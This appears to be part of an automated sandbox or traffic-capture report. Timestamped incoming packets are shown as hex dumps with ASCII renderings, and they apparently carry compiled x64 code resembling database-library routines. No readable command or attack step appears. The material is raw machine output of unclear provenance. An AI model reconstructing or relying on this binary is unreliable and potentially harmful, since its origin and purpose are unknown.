c4 49 8b 16 41 8b cc 44 0f b6 02 45 84 c0 74 20 0f 1f 44 00 00 41 80 f8 22 8d 41 01 44 0f b6 42 01 48 8d 52 01 0f Data Ascii: WpDF`HHVMH~H<oH8pDF`HV8H~HH pNd3H~8fn`H\$0H\|$8Hl$@H ^HT$SWATAVAWH@z6E3LJLHE~CD@IADEtA"HDBHREAEuAIDIuIADEt DA"ADBHR
2023-11-18 09:02:42 UTC	9649	IN	Data Raw: 86 70 01 00 00 49 8b 1c 06 48 8b 5b 50 48 85 db 74 0e 4c 39 2b 74 09 48 8b 5b 28 48 85 db 75 f2 48 63 97 98 00 00 00 39 97 9c 00 00 00 7f 1c 45 33 c9 44 89 64 24 20 45 33 c0 ba a8 00 00 00 48 8b cf e8 e7 14 03 00 8b d0 eb 26 48 8d 0c 52 8d 42 01 89 87 98 00 00 00 48 8b 87 90 00 00 00 48 c7 04 c8 a8 00 00 00 4c 89 64 c8 08 4c 89 64 c8 10 48 8b 07 44 38 60 63 75 48 85 d2 79 08 8b 97 98 00 00 00 ff ca 48 63 c2 48 8d 0c 40 48 8b 87 90 00 00 00 44 38 64 c8 01 48 8d 14 c8 74 13 41 b9 f4 ff ff ff 4c 8b c3 48 8b cf e8 fe fb 02 00 eb 10 48 85 db 74 0b 48 89 5a 10 c6 42 01 f4 ff 43 18 ff c5 49 83 c6 08 3b ae 18 01 00 00 0f 8c 2a ff ff ff 48 8b ce 44 89 a6 18 01 00 00 e8 cb 01 00 00 48 8b ce e8 b3 89 fe ff 4c 8b 66 58 33 db 4d 85 e4 74 7a 88 5e 23 44 8b fb 41 39 1c Data Ascii: pIH[PHtL9+tH[(HuHc9E3Dd$ E3H&HRBHHLdLdHD8`cuHyHcH@HD8dHtALHHtHZBCI;*HDHLfX3Mtz^#DA9
2023-11-18 09:02:42 UTC	9665	IN	Data Raw: 00 00 80 7c c8 01 00 48 8d 14 c8 74 18 4c 8b 84 24 88 00 00 00 41 b9 fa ff ff ff 48 8b cb e8 8b bc 02 00 eb 15 48 8b 84 24 88 00 00 00 48 85 c0 74 08 48 89 42 10 c6 42 01 fa 8b 83 98 00 00 00 85 c0 7e 1a ff c8 48 63 c8 48 8b 83 90 00 00 00 48 8d 14 49 b9 08 00 00 00 66 89 4c d0 02 41 f7 44 24 5c 00 08 00 00 0f 85 d7 03 00 00 41 83 bc 24 f8 02 00 00 00 0f 85 c8 03 00 00 8b 44 24 74 41 b8 01 00 00 00 4c 8b 94 24 10 01 00 00 41 8b d5 44 8b 74 24 58 44 8d 78 04 44 8d 60 03 44 89 7c 24 60 45 03 f7 44 89 a4 24 a8 00 00 00 45 39 72 38 8d 78 01 8d 70 02 41 8b ce 48 8b 84 24 18 01 00 00 45 8b ce 41 0f 4f 4a 38 8b 68 30 41 89 4a 38 49 8b ca 8b 83 98 00 00 00 89 44 24 48 e8 6a 05 00 00 45 8b c6 ba 32 00 00 00 48 8b cb e8 da d2 02 00 44 8b 4c 24 74 41 b8 02 00 00 00 Data Ascii: \|HtL$AHH$HtHBB~HcHHIfLAD$\A$D$tAL$ADt$XDxD`D\|$`ED$E9r8xpAH$EAOJ8h0AJ8ID$HjE2HDL$tA
2023-11-18 09:02:42 UTC	9681	IN	Data Raw: 00 41 5e 41 5d 41 5c 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 71 10 48 8b f9 48 8b 19 48 85 f6 74 21 8b 46 24 3d a3 0d f2 2d 74 07 3d 73 29 9c 31 75 08 48 8b ce e8 99 50 02 00 48 8b ce e8 01 4a 02 00 48 8b 97 40 01 00 00 48 85 d2 74 1d 48 85 db 74 0a 48 83 bb 18 03 00 00 00 75 06 83 42 2c ff 75 08 48 8b cb e8 88 66 ff ff 48 8b 8f 48 01 00 00 48 85 c9 74 22 48 8b 41 28 48 8b d1 48 8b cb 48 89 87 48 01 00 00 e8 76 72 ff ff 48 8b 8f 48 01 00 00 48 85 c9 75 de 48 8b 97 50 01 00 00 48 8b cb e8 fb 39 fc ff 48 8b 4f 08 48 85 c9 74 62 48 85 db 74 58 48 83 bb 18 03 00 00 00 74 0d 48 8b d1 48 8b cb e8 68 5f 05 00 eb 46 48 3b 8b 08 02 00 00 73 38 48 3b 8b f8 01 00 00 72 13 48 8b 83 f0 01 Data Ascii: A^A]A\_[]H\$Ht$WH HqHHHt!F$=-t=s)1uHPHJH@HtHtHuB,uHfHHHt"HA(HHHHvrHHHuHPH9HOHtbHtXHtHHh_FH;s8H;rH
2023-11-18 09:02:42 UTC	9687	IN	Data Raw: 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc 48 8b 81 90 01 00 00 48 85 c0 74 16 0f 1f 40 00 4c 39 00 74 0a 48 8b 40 18 48 85 c0 75 f2 c3 48 89 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 74 24 18 57 48 83 ec 20 80 b9 14 01 00 00 03 49 8b f0 48 8b da 48 8b f9 0f 84 95 00 00 00 48 8b 09 48 85 c9 74 0c ba 20 00 00 00 e8 49 43 05 00 eb 4e 83 3d a0 d6 09 00 00 74 3a 48 8b 0d 57 0c 0a 00 48 85 c9 74 06 ff 15 0c d7 09 00 48 8d 54 24 30 b9 20 00 00 00 e8 1d 4b 05 00 48 8b 0d 36 0c 0a 00 48 85 c9 74 06 ff 15 fb d6 09 00 4c 8b 44 24 30 eb 0e b9 20 00 00 00 ff 15 79 d6 09 00 4c 8b c0 4d 85 c0 74 2b 33 c0 49 89 40 08 49 89 40 10 49 89 40 18 49 89 18 0f 10 06 41 0f 11 40 08 48 8b 87 90 01 00 00 49 89 40 18 4c 89 87 90 01 00 00 48 8b 74 24 40 48 8b Data Ascii: 3HHt@L9tH@HuHH\$Ht$WH IHHHHt ICN=t:HWHtHT$0 KH6HtLD$0 yLMt+3I@I@I@IA@HI@LHt$@H
2023-11-18 09:02:42 UTC	9701	IN	Data Raw: 8b cf e8 77 fd ff ff 48 8b 0f 48 8b d5 c6 47 23 01 e8 b8 6f 00 00 8b 93 98 00 00 00 85 f6 79 03 8d 72 ff 48 8b 03 80 78 63 00 74 0f 48 8d 05 93 d5 09 00 89 50 08 e9 ac 00 00 00 48 63 c6 48 8d 0c 40 48 8b 83 90 00 00 00 89 54 c8 08 48 8d 04 c8 e9 91 00 00 00 33 d2 8b ea 48 85 f6 75 10 48 8b 0f 48 8b d5 e8 44 5f 00 00 48 8b f0 eb 41 48 63 06 8d 48 01 39 4e 04 7d 13 48 8b 0f 4c 8b c5 48 8b d6 e8 36 5e 00 00 48 8b f0 eb 23 0f 10 05 c2 29 07 00 48 c1 e0 05 0f 10 0d c7 29 07 00 89 0e 0f 11 44 30 08 0f 11 4c 30 18 48 89 6c 30 08 48 85 f6 74 2e 8b 06 ff c8 48 63 c8 41 8b c6 48 c1 e1 05 c1 e8 1c 83 e0 08 83 64 31 1c f7 09 44 31 1c 45 85 f6 79 07 ff 47 38 44 8b 77 38 44 89 74 31 20 48 89 77 58 41 8b c6 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 30 41 5f Data Ascii: wHHG#oyrHxctHPHcH@HTH3HuHHD_HAHcH9N}HLH6^H#)H)D0L0Hl0Ht.HcAHd1D1EyG8Dw8Dt1 HwXAH\$PHl$XHt$`H0A_
2023-11-18 09:02:42 UTC	9715	IN	Data Raw: 48 85 c0 0f 84 80 00 00 00 33 c0 48 89 03 48 89 43 08 48 89 43 10 48 89 43 18 48 89 43 20 48 89 43 28 48 89 43 30 48 89 43 38 48 89 43 40 c6 03 9a 66 44 89 6b 32 45 85 e4 75 24 8b 84 24 b0 00 00 00 b9 00 00 00 20 85 c0 89 43 08 ba 00 00 00 10 0f 45 ca 81 c9 00 04 80 00 09 4b 04 eb 23 48 8d 4b 48 48 89 4b 08 85 f6 74 0f 44 8b c6 48 8d 15 31 2f 06 00 e8 84 27 f0 ff 48 8b 43 08 c6 04 06 00 c7 43 28 01 00 00 00 45 33 c9 4c 8b c3 ba 93 00 00 00 49 8b ce e8 b2 3f 00 00 48 89 45 60 4c 8d 44 24 30 c7 45 08 00 00 00 00 48 8b d5 49 8b ce e8 07 c9 fb ff 4c 8b 6c 24 60 4c 8b 64 24 68 48 8b 74 24 70 85 c0 74 14 41 83 7e 30 00 74 09 0f b6 07 88 47 02 c6 07 b5 33 c0 eb 78 8b 94 24 a0 00 00 00 8b 5c 24 34 89 5f 2c 85 d2 74 08 49 8b cf e8 26 fa 01 00 44 8b 47 44 ba 42 00 Data Ascii: H3HHCHCHCHC HC(HC0HC8HC@fDk2Eu$$ CEK#HKHHKtDH1/'HCC(E3LI?HE`LD$0EHILl$`Ld$hHt$ptA~0tG3x$\$4_,tI&DGDB
2023-11-18 09:02:42 UTC	9730	IN	Data Raw: eb 53 83 3d bd 27 09 00 00 74 35 48 8b 0d 74 5d 09 00 48 85 c9 74 06 ff 15 29 28 09 00 48 8d 54 24 38 b9 78 00 00 00 e8 3a 9c 04 00 48 8b 0d 53 5d 09 00 48 85 c9 74 18 ff 15 18 28 09 00 eb 10 b9 78 00 00 00 ff 15 9b 27 09 00 48 89 44 24 38 48 8b 7c 24 38 48 85 ff 74 0e 33 d2 48 8b cf 44 8d 42 78 e8 9e f1 ef ff 48 89 7b 28 33 ff 48 89 7b 30 48 89 7b 38 48 89 7b 40 48 89 7b 48 48 89 7b 50 48 89 7b 58 48 89 7b 60 48 89 7b 68 48 89 7b 70 48 89 7b 78 49 8b 0e 40 38 79 63 74 19 48 8d 44 24 50 44 8b c7 48 3b d8 48 8b d3 41 0f 95 c0 e8 60 75 fc ff 8b f7 49 89 7f 20 48 85 f6 74 0f 48 85 ed 74 07 c6 06 86 48 89 6e 50 48 8b ee 48 8b 5c 24 40 41 ff c5 8b 54 24 30 49 83 c4 20 44 3b 2b 0f 8c 30 fe ff ff eb 29 41 83 f8 01 89 54 24 20 48 8d 05 74 ee 05 00 49 8b ce 4c 8d Data Ascii: S='t5Ht]Ht)(HT$8x:HS]Ht(x'HD$8H\|$8Ht3HDBxH{(3H{0H{8H{@H{HH{PH{XH{`H{hH{pH{xI@8yctHD$PDH;HA`uI HtHtHnPHH\$@AT$0I D;+0)AT$ HtIL
2023-11-18 09:02:42 UTC	9746	IN	Data Raw: 8b 84 24 d0 00 00 00 80 b8 14 01 00 00 02 72 28 4d 85 d2 74 23 48 8b 80 90 01 00 00 48 85 c0 74 17 49 8d 4d 40 90 48 39 08 0f 84 58 01 00 00 48 8b 40 18 48 85 c0 75 ee 33 ff 4c 8b 94 24 e8 00 00 00 49 8b ca e8 7c 13 04 00 45 0f bf 7b 36 44 0f b6 e8 49 8b 73 08 8b ef 45 85 ff 0f 8e af 00 00 00 4c 63 64 24 40 44 38 6e 0e 0f 85 87 00 00 00 48 8b 16 4d 8b ca 4c 2b ca 0f b6 02 45 0f b6 04 11 41 3b c0 0f 85 06 01 00 00 85 c0 0f 85 17 01 00 00 49 83 fc 01 0f 85 54 01 00 00 41 f6 46 3c 04 75 54 49 8b 46 50 48 85 c0 0f 84 40 01 00 00 33 c9 8b d9 48 63 48 08 85 c9 0f 8e 30 01 00 00 4c 8b 18 48 8b f9 4d 8b 03 4d 2b d0 66 0f 1f 84 00 00 00 00 00 41 0f b6 00 47 0f b6 0c 02 41 3b c1 0f 85 ca 00 00 00 85 c0 0f 85 e0 00 00 00 4c 8b 94 24 e8 00 00 00 ff c5 48 83 c6 18 41 Data Ascii: $r(Mt#HHtIM@H9XH@Hu3L$I\|E{6DIsELcd$@D8nHML+EA;ITAF<uTIFPH@3HcH0LHMM+fAGA;L$HA
2023-11-18 09:02:42 UTC	9762	IN	Data Raw: 00 48 8b 05 ce 88 08 00 48 33 c4 48 89 84 24 20 02 00 00 48 83 79 18 00 4c 8b e2 4c 8b f9 75 2e 48 8b 49 10 48 8b 49 28 e8 a9 fe 00 00 49 89 47 18 48 85 c0 74 4a 49 8b 4f 10 48 8b 51 28 0f b7 4a 06 66 89 48 10 49 8b 47 18 c6 40 13 00 49 8b 47 10 48 89 9c 24 70 02 00 00 49 8b 1c 24 48 89 b4 24 40 02 00 00 0f b6 48 5c 48 89 bc 24 38 02 00 00 80 f9 01 75 13 48 8d 05 28 11 00 00 eb 1f b8 07 00 00 00 e9 28 01 00 00 80 f9 02 48 8d 05 52 14 00 00 48 8d 15 7b 12 00 00 48 0f 44 c2 33 d2 49 89 47 40 41 b8 00 02 00 00 48 8d 4c 24 20 e8 51 71 ef ff 33 ff 48 85 db 0f 84 99 00 00 00 48 89 ac 24 78 02 00 00 4c 89 b4 24 30 02 00 00 66 0f 1f 44 00 00 49 8b 44 24 08 48 85 c0 74 13 48 3b d8 75 05 48 8b ef eb 0d 48 63 6b 08 48 03 e8 eb 04 48 8b 6b 08 48 8b f7 48 89 7b 08 48 Data Ascii: HH3H$ HyLLu.HIHI(IGHtJIOHQ(JfHIG@IGH$pI$H$@H\H$8uH((HRH{HD3IG@AHL$ Qq3HH$xL$0fDID$HtH;uHHckHHkHH{H
2023-11-18 09:02:42 UTC	9778	IN	Data Raw: 0f b6 74 24 40 44 8d 42 fd 0f 84 8a 51 00 00 48 8b 7c 24 48 f7 d9 44 8b 64 24 44 45 33 db 4c 8b 74 24 68 48 83 c7 18 4c 8b 4c 24 50 41 ba 00 24 00 00 48 8b 5c 24 60 89 4d 80 e9 b1 eb ff ff 8b 45 80 85 c0 48 8b 44 24 48 79 1d 8b 40 04 48 8b 5c 24 60 ff c8 48 98 48 8d 0c 40 49 8d 3c c9 48 83 c7 18 e9 88 eb ff ff 75 1d 8b 40 08 48 8b 5c 24 60 ff c8 48 98 48 8d 0c 40 49 8d 3c c9 48 83 c7 18 e9 69 eb ff ff 8b 40 0c 48 8b 5c 24 60 ff c8 48 98 48 8d 0c 40 49 8d 3c c9 48 83 c7 18 e9 4c eb ff ff 48 8b 44 24 48 ba 02 00 00 00 48 63 40 04 48 6b c8 38 49 03 cd e8 c8 35 01 00 8b d8 ba 02 00 00 00 48 8b 44 24 48 48 63 48 08 48 6b c9 38 49 03 cd e8 ac 35 01 00 48 8b 4c 24 48 8d 04 58 03 c3 80 39 2c 48 8d 0d e8 07 ef ff 48 98 75 0a 0f b6 8c 08 08 cf 16 00 eb 08 0f b6 8c Data Ascii: t$@DBQH\|$HDd$DE3Lt$hHLL$PA$H\$`MEHD$Hy@H\$`HH@I<Hu@H\$`HH@I<Hi@H\$`HH@I<HLHD$HHc@Hk8I5HD$HHcHHk8I5HL$HX9,HHu
2023-11-18 09:02:42 UTC	9794	IN	Data Raw: 85 c0 74 0e 66 90 48 8b c8 48 8b 40 08 48 85 c0 75 f4 48 8b 44 24 48 48 63 40 04 48 6b f8 38 48 03 79 20 eb 10 48 8b 44 24 48 48 63 40 04 48 6b f8 38 49 03 fd 48 8b cf e8 99 f5 00 00 48 8b 4c 24 48 48 63 41 08 48 6b d8 38 49 03 dd 48 8b cb e8 81 f5 00 00 48 8b 03 45 33 db 41 8d 53 04 45 8d 43 01 48 39 07 0f 8d f9 10 00 00 4c 8b 4c 24 50 41 ba 00 24 00 00 48 8b 5c 24 60 48 89 07 48 8b 7c 24 48 48 83 c7 18 e9 63 ab ff ff 48 8b 44 24 48 48 8b 7c 24 48 48 63 40 04 48 6b c8 38 4a 8b 14 29 48 85 d2 0f 8e 36 c7 ff ff 48 8b c7 48 63 40 0c 48 2b d0 4a 89 14 29 e9 b2 c4 ff ff 48 8b 4c 24 48 48 8b d1 48 63 41 04 48 6b d8 38 48 63 41 0c 49 8b ce 48 6b f8 38 e8 b7 1f 00 00 4a 8b 0c 2b 45 33 db 48 89 4d 30 4c 8b d0 48 85 c9 7e 31 4a 8b 0c 2f 41 8b d3 48 85 c9 48 0f 4f Data Ascii: tfHH@HuHD$HHc@Hk8Hy HD$HHc@Hk8IHHL$HHcAHk8IHHE3ASECH9LL$PA$H\$`HH\|$HHcHD$HH\|$HHc@Hk8J)H6HHc@H+J)HL$HHHcAHk8HcAIHk8J+E3HM0LH~1J/AHHO
2023-11-18 09:02:42 UTC	9810	IN	Data Raw: 52 00 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 45 33 c9 45 8d 41 01 e9 34 00 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 45 33 c9 45 33 c0 e9 15 00 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 6c 24 18 48 89 74 24 20 41 56 48 83 ec 30 41 8b e8 8b f2 4c 8b f1 48 85 c9 75 3c 48 8d 05 00 22 05 00 41 b9 4c 4f 01 00 4c 8d 05 8b f9 04 00 48 89 44 24 20 48 8d 15 4b f9 04 00 41 8d 4e 15 e8 5a 28 03 00 33 c0 48 8b 6c 24 50 48 8b 74 24 58 48 83 c4 30 41 5e c3 0f b7 81 c8 00 00 00 48 89 5c 24 40 48 8b 19 48 89 7c 24 48 33 ff 3b f0 7d 59 85 f6 78 55 48 8b 4b 18 41 0f af c1 03 f0 48 85 c9 74 06 ff 15 64 e7 07 00 48 63 c6 48 6b c8 38 49 03 8e a0 00 00 00 85 ed 74 07 e8 9d 19 00 00 eb 05 e8 d6 19 00 Data Ascii: RE3EA4E3E3Hl$Ht$ AVH0ALHu<H"ALOLHD$ HKANZ(3Hl$PHt$XH0A^H\$@HH\|$H3;}YxUHKAHtdHcHk8It
2023-11-18 09:02:42 UTC	9826	IN	Data Raw: 42 03 48 c1 e2 08 48 0b d1 48 0b d0 b8 04 00 00 00 66 41 89 40 08 49 89 10 c3 0f b6 41 03 0f b6 51 02 48 c1 e2 08 48 0b d0 0f b6 41 04 48 c1 e2 08 48 0b d0 0f b6 41 05 48 c1 e2 08 48 0b d0 0f be 01 c1 e0 08 48 63 c8 41 0f b6 42 01 48 0b c8 b8 04 00 00 00 48 c1 e1 20 48 03 d1 66 41 89 40 08 49 89 10 b8 06 00 00 00 c3 e9 77 00 00 00 b8 04 00 00 00 8d 4a f8 66 41 89 40 08 33 c0 49 89 08 c3 8b ca 4d 89 50 10 8d 42 f4 d1 e8 83 e1 01 41 89 40 0c 41 0f b7 8c 4b 34 24 17 00 66 41 89 48 08 c3 0f 1f 00 97 b6 11 00 a4 b6 11 00 bb b6 11 00 df b6 11 00 0f b7 11 00 44 b7 11 00 94 b7 11 00 94 b7 11 00 99 b7 11 00 99 b7 11 00 83 b6 11 00 97 b6 11 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 41 01 4c 8b c9 44 0f b6 11 49 c1 e2 08 4c 0b d0 0f b6 41 02 49 c1 e2 Data Ascii: BHHHfA@IAQHHAHHAHHHcABHH HfA@IwJfA@3IMPBA@AK4$fAHDALDILAI
2023-11-18 09:02:42 UTC	9842	IN	Data Raw: 8b c1 0f ba e8 07 48 8b f2 4c 8b 4f 50 89 81 d0 00 00 00 8b 81 98 00 00 00 ff c8 48 98 48 8d 0c 40 49 8b 80 90 00 00 00 48 8d 14 c8 0f b6 02 3c 3f 77 6d 0f b6 c8 83 f9 0a 77 53 8b c1 41 8b 8c 8a 68 f8 11 00 49 03 ca ff e1 83 7a 08 00 74 0b 41 81 a0 d0 00 00 00 7f ff ff ff 41 81 88 d0 00 00 00 00 01 00 00 eb 38 4c 89 5a 10 c6 42 01 fb eb 2e 48 89 6a 10 c6 42 01 fb eb 24 8b 42 08 3b c3 7e 1d 8b d8 eb 19 39 5a ec 0f 4f 5a ec 8b 42 08 85 c0 79 0b f7 d0 48 98 41 8b 0c 81 89 4a 08 49 3b 90 90 00 00 00 74 09 48 83 ea 18 e9 7a ff ff ff 48 8b 57 50 49 8b 08 48 85 d2 74 5f 48 85 c9 74 52 48 83 b9 18 03 00 00 00 74 07 e8 e4 d8 02 00 eb 49 48 3b 91 08 02 00 00 73 38 48 3b 91 f8 01 00 00 72 13 48 8b 81 f0 01 00 00 48 89 02 48 89 91 f0 01 00 00 eb 24 48 3b 91 00 02 00 Data Ascii: HLOPHH@IH<?wmwSAhIztAA8LZB.HjB$B;~9ZOZByHAJI;tHzHWPIHt_HtRHtIH;s8H;rHHH$H;
2023-11-18 09:02:42 UTC	9858	IN	Data Raw: e4 03 00 48 8d 4c 24 20 e8 b9 68 02 00 8b 44 24 38 c6 04 18 00 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 70 80 79 11 00 48 8b d9 48 89 bc 24 90 00 00 00 48 8b fa 74 0e ff 41 14 80 79 12 00 75 05 e8 c8 fb 00 00 80 7f 11 00 74 11 ff 47 14 80 7f 12 00 75 08 48 8b cf e8 b1 fb 00 00 48 8b 43 08 48 89 b4 24 88 00 00 00 48 8b 08 48 8b 49 48 4c 8b 09 4d 85 c9 74 38 48 8b 47 08 4c 8d 84 24 80 00 00 00 8b 50 40 48 63 40 34 48 0f af d0 48 89 94 24 80 00 00 00 ba 0b 00 00 00 41 ff 51 50 33 f6 83 f8 0c 0f 45 f0 85 f6 0f 85 ec 00 00 00 33 c0 48 89 7c 24 48 48 89 44 24 38 48 89 44 24 20 48 89 44 24 30 48 89 44 24 50 48 89 44 24 58 48 89 44 24 60 48 8b 07 48 89 44 24 40 48 8b 47 08 48 89 5c 24 28 c7 44 24 38 01 00 00 00 48 8b 10 48 8b 43 08 48 8b Data Ascii: HL$ hD$8H@[@SHpyHH$HtAyutGuHHCH$HHIHLMt8HGL$P@Hc@4HH$AQP3E3H\|$HHD$8HD$ HD$0HD$PHD$XHD$`HHD$@HGH\$(D$8HHCH
2023-11-18 09:02:42 UTC	9874	IN	Data Raw: 8b c7 4c 8b 6c 24 70 48 8b 74 24 78 48 8b ac 24 80 00 00 00 4c 8b 7c 24 68 48 81 c4 88 00 00 00 41 5e 41 5c 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 54 24 10 48 89 4c 24 08 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 4c 8b 69 20 48 8b e9 48 8b ca 4c 89 6c 24 50 49 8b d8 45 33 ff 4d 8b a5 88 00 00 00 e8 61 65 00 00 4c 8b 9c 24 b8 00 00 00 41 8d 7f 01 41 8b 43 40 3d 80 00 00 00 73 0d 41 0f b6 43 40 41 88 04 24 8b c7 eb 3e 48 8b d0 48 83 f8 7f 77 0b 80 e2 7f 8b c7 41 88 14 24 eb 2a 48 81 fa ff 3f 00 00 77 19 48 c1 e8 07 0c 80 80 e2 7f 41 88 04 24 41 88 54 24 01 b8 02 00 00 00 eb 08 49 8b cc e8 5f 06 02 00 0f b6 c0 4c 03 e0 4c 39 bd 80 00 00 00 75 47 48 83 fb 7f 77 09 80 e3 7f 41 88 1c 24 eb 32 48 81 fb ff 3f 00 00 77 1c 48 Data Ascii: Ll$pHt$xH$L\|$hHA^A\_[H\$HT$HL$UVWATAUAVAWHpLi HHLl$PIE3MaeL$AAC@=sAC@A$>HHwA$*H?wHA$AT$I_LL9uGHwA$2H?wH
2023-11-18 09:02:42 UTC	9890	IN	Data Raw: 8b 9c 24 a0 00 00 00 48 83 c4 50 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 50 4d 8b c8 45 0f b7 40 16 4c 03 c2 4c 3b 41 58 76 35 48 8d 2d 36 e2 03 00 41 b9 70 1a 01 00 4c 8d 05 ad b9 03 00 48 89 6c 24 20 48 8d 15 81 b9 03 00 b9 0b 00 00 00 e8 8f e8 01 00 b8 0b 00 00 00 48 83 c4 50 5d c3 41 0f b7 41 14 33 d2 48 89 5c 24 70 48 89 74 24 78 48 89 7c 24 48 41 8b 78 fc 4c 89 64 24 40 4c 89 74 24 38 4c 8b 71 48 41 8b 49 10 2b c8 4c 89 7c 24 30 0f cf 45 8b 46 38 41 83 e8 04 41 8d 40 ff 03 c1 41 f7 f0 8b f0 85 c0 0f 84 8a 01 00 00 45 33 ff 48 8d 2d ae e1 03 00 45 8d 67 64 66 0f 1f 44 00 00 ff ce 44 89 7c 24 60 4c 89 7c 24 68 83 ff 02 0f 82 8b 01 00 00 41 3b 7e 40 0f 87 81 01 00 00 85 f6 74 26 4c 8d 4c 24 60 8b Data Ascii: $HPA_A^A]A\_^]@UHPME@LL;AXv5H-6ApLHl$ HHP]AA3H\$pHt$xH\|$HAxLd$@Lt$8LqHAI+L\|$0EF8AA@AE3H-EgdfDD\|$`L\|$hA;~@t&LL$`
2023-11-18 09:02:42 UTC	9906	IN	Data Raw: 4d 85 e4 74 11 48 8b 47 18 48 8b 48 50 8b 41 28 0f c8 41 89 04 24 85 ed 74 27 49 8b 06 8b 90 00 03 00 00 41 3b 97 80 00 00 00 7e 12 45 38 6f 0a 74 0c 49 8b cf e8 7c 89 00 00 8b d8 eb 03 41 8b dd 41 80 7e 11 00 4c 8b 7c 24 20 4c 8b 6c 24 28 4c 8b 64 24 30 48 8b 7c 24 60 48 8b 74 24 58 48 8b 6c 24 50 74 0f 41 83 6e 14 01 75 08 49 8b ce e8 91 3c 00 00 8b c3 48 83 c4 38 41 5e 5b c3 cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 80 79 11 00 48 8b d9 74 0e ff 41 14 80 79 12 00 75 05 e8 6f 3b 00 00 48 8b 43 08 c7 40 40 00 00 00 00 48 8b 4b 08 e8 2b 00 00 00 80 7b 11 00 8b f8 74 10 83 6b 14 01 75 0a 48 8b cb e8 35 3c 00 00 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc 40 57 48 83 ec 20 83 79 40 00 48 8b f9 76 08 33 c0 48 83 c4 20 5f c3 48 89 Data Ascii: MtHGHHPA(A$t'IA;~E8otI\|AA~L\|$ Ll$(Ld$0H\|$`Ht$XHl$PtAnuI<H8A^[H\$WH yHtAyuo;HC@@HK+{tkuH5<H\$0H _@WH y@Hv3H _H
2023-11-18 09:02:42 UTC	9922	IN	Data Raw: 48 89 43 48 48 89 43 50 48 89 43 58 48 89 43 60 48 89 43 68 48 89 43 70 4c 8b bc 24 88 00 00 00 80 7b 40 00 74 29 80 7b 3f 00 75 14 48 8b 4b 08 33 d2 48 8b 01 44 8d 4a 09 44 8d 42 01 ff 50 70 c6 43 40 00 c7 43 7c 00 00 00 00 c6 43 43 00 80 7b 41 00 74 20 80 7b 3f 00 75 16 48 8b 4b 08 ba 01 00 00 00 44 8b c2 48 8b 01 44 8d 4a 08 ff 50 70 c6 43 41 00 85 ff 75 0a 45 3b f4 74 05 bf 05 00 00 00 8b c7 48 8b 7c 24 78 48 83 c4 40 41 5e 41 5d 41 5c 5d 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 55 41 56 48 8b ec 48 83 ec 78 48 8b 05 19 08 06 00 48 33 c4 48 89 45 f0 48 8b 41 30 45 33 f6 4d 8b e8 89 55 bc 8b f2 44 89 4d ac 48 8b f9 4c 89 75 c0 48 8b 18 45 8d 46 30 48 8b d3 44 89 75 b0 48 83 c1 48 e8 41 54 ee ff 85 c0 74 08 8b 43 10 ff c0 89 Data Ascii: HCHHCPHCXHC`HChHCpL${@t){?uHK3HDJDBPpC@C\|CC{At {?uHKDHDJPpCAuE;tH\|$xH@A^A]A\][@USVWAUAVHHxHH3HEHA0E3MUDMHLuHEF0HDuHHATtC
2023-11-18 09:02:42 UTC	9938	IN	Data Raw: 72 ed ff ff 8b f8 48 8b cb e8 c8 3a 00 00 48 8b 5c 24 40 8b c7 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 0f b6 41 16 33 ff 48 8b d9 3c 04 72 04 3c 05 75 4f 40 38 79 11 75 15 48 8b 49 48 ba 04 00 00 00 48 8b 01 ff 50 38 8b f8 85 c0 75 08 c6 43 16 04 85 ff 74 2c 48 8b 4b 48 48 83 39 00 74 1b 80 7b 11 00 75 0b 48 8b 01 ba 01 00 00 00 ff 50 40 80 7b 16 05 74 04 c6 43 16 01 0f b6 43 10 88 43 17 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 80 79 11 00 48 8b 41 48 48 8b 10 75 12 80 79 08 00 75 0f 83 3a 02 7c 07 48 83 7a 68 00 75 03 33 c0 c3 b8 01 00 00 00 c3 cc cc cc cc cc cc cc cc 48 8b 91 40 01 00 00 48 85 d2 74 0b 8b 42 18 c7 42 18 00 00 00 00 c3 33 c0 c3 cc cc cc cc cc cc 40 53 48 83 ec 50 4c 8b 91 Data Ascii: rH:H\$@H0_H\$WH A3H<r<uO@8yuHIHHP8uCt,HKHH9t{uHP@{tCCCH\$0H _yHAHHuyu:\|Hzhu3H@HtBB3@SHPL
